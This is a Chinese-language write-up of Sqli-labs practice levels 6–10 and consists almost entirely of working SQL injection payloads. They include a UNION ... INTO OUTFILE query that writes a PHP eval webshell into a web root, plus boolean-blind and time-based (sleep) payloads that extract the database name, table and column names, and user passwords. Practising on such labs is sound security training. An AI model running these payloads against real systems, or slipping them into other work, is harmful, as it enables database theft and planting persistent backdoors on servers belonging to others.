重闯Sqli-labs关卡第三天(6-10关)

1 $id = ‘"‘.$id.‘"‘;
2 $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

$sql="SELECT * FROM users WHERE id=((‘$id‘)) LIMIT 0,1";

id=1‘)) and 1=1--+
id=1‘)) and 1=2--+
#写入一句话webshell
id=1‘))UNION SELECT 1,"<?php @eval($_POST[‘X‘]);?>",3 into outfile "C:\\phpStudy\\PHPTutorial\\WWW\\lou\\sql\\Less-7\\muma.php"--+

 1 判断数据库长度
 2 ‘ and length(database())=8--+
 3 爆数据库名
 4 ‘ and left((select database()),1)=‘s‘--+
 5 判断数据库中表的数量
 6 ‘ and if((select count(*) from information_schema.tables where table_schema=database())>1,sleep(5),1)--+
 7 ‘ and (select count(*) from information_schema.tables where table_schema=database())>1 --+
 8 爆表名
 9 ‘ and left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)=‘r‘ --+
10 判断字段数量
11 ‘ and (select count(*) from information_schema.columns where table_name=‘users‘)>1--+
12 爆字段名
13 ‘ and left((select column_name from information_schema.columns where table_name=‘users‘ limit 1,1),1)=‘f‘--+
14 爆数据
15 ‘ and left((select password from users limit 0,1),1)=‘D‘ --+

1 ‘ and if(length(database())=8,sleep(3),1)--+
2 ‘ and if(left(database(),1)=‘s‘,sleep(3),1)--+
3 ‘ and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)=‘r‘,sleep(3),1)--+
4 ‘ and if(left((select column_name from information_schema.columns where table_name=‘users‘ limit 4,1),8)=‘password‘,sleep(3),1)--+
5 ‘ and if(left((select password from users limit 0,1),1)=‘D‘,sleep(3),1) --+

1 " and if(length(database())=8,sleep(3),1)--+
2 " and if(left(database(),1)=‘s‘,sleep(3),1)--+
3 " and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)=‘r‘,sleep(3),1)--+
4 " and if(left((select column_name from information_schema.columns where table_name=‘users‘ limit 4,1),8)=‘password‘,sleep(3),1)--+
5 " and if(left((select password from users limit 0,1),1)=‘D‘,sleep(3),1)--+